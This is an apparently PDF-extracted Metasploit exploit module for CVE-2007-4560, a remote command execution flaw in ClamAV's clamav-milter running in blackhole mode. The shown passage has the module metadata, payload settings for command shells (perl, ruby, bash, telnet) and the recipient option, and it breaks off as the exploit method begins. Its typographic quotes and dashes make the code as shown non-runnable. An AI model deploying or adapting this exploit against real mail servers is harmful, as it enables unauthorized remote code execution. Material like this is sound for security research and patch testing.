1 ##
2 # $Id$
3 ##
4
5 ##
6 # This file is part of the Metasploit Framework and may be subject to
7 # redistribution and commercial restrictions. Please see the Metasploit
8 # Framework web site for more information on licensing and terms of use.
9 # http://metasploit.com/framework/
10 ##
11
12 require ’msf/core’
13
14
15 class Metasploit3 < Msf::Exploit::Remote
16
17
include Msf::Exploit::Remote::Smtp
18
19
def initialize(info = {})
20
super(update_info(info,
21
’Name’ => ’ClamAV Milter Blackhole−Mode Remote Code Execution’,
22
’Description’ => %q{
23
This module exploits a flaw in the Clam AntiVirus suite ’clamav−milter’
24
(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
25
When implemented with black hole mode enabled, it is possible to execute
26
commands remotely due to an insecure popen call.
27
},
28
’Author’ => [ ’patrick’ ],
29
’License’ => MSF_LICENSE,
30
’Version’ => ’$Revision$’,
31
’References’ =>
32
[
33
[ ’CVE’, ’2007−4560’ ],
34
[ ’OSVDB’, ’36909’ ],
35
[ ’BID’, ’25439’ ],
36
[ ’URL’, ’http://www.milw0rm.com/exploits/4761’ ],
37
],
38
’Privileged’ => true,
39
’Payload’ =>
40
{
41
’DisableNops’ => true,
42
’Space’ => 1024,
43
’Compat’ =>
44
{
45
’PayloadType’ => ’cmd’,
46
’RequiredCmd’ => ’generic perl ruby bash telnet’,
47
}
48
},
49
’Platform’ => ’unix’,
50
’Arch’ => ARCH_CMD,
51
’Targets’ =>
52
[
Page 1/2
ClamAV Milter 0.92.2 BlackholeMode sendmail Code Execution
patrick
08/24/2007
53
[ ’Automatic’, { }],
54
],
55
’DisclosureDate’ => ’Aug 24 2007’,
56
’DefaultTarget’ => 0))
57
58
register_options(
59
[
60
OptString.new(’MAILTO’, [ true, ’TO address of the e−mail’, ’nobody@localhost’]),
61
], self.class)
62
end
63
64
def exploit
65
66
# ClamAV writes randomized msg.###### temporary files in a randomized
67
# /tmp/clamav−#######################/ directory. This directory is
68
# the clamav−milter process working directory.
69
#
70
# We *can* execute arbitrary code directly from ’sploit’, however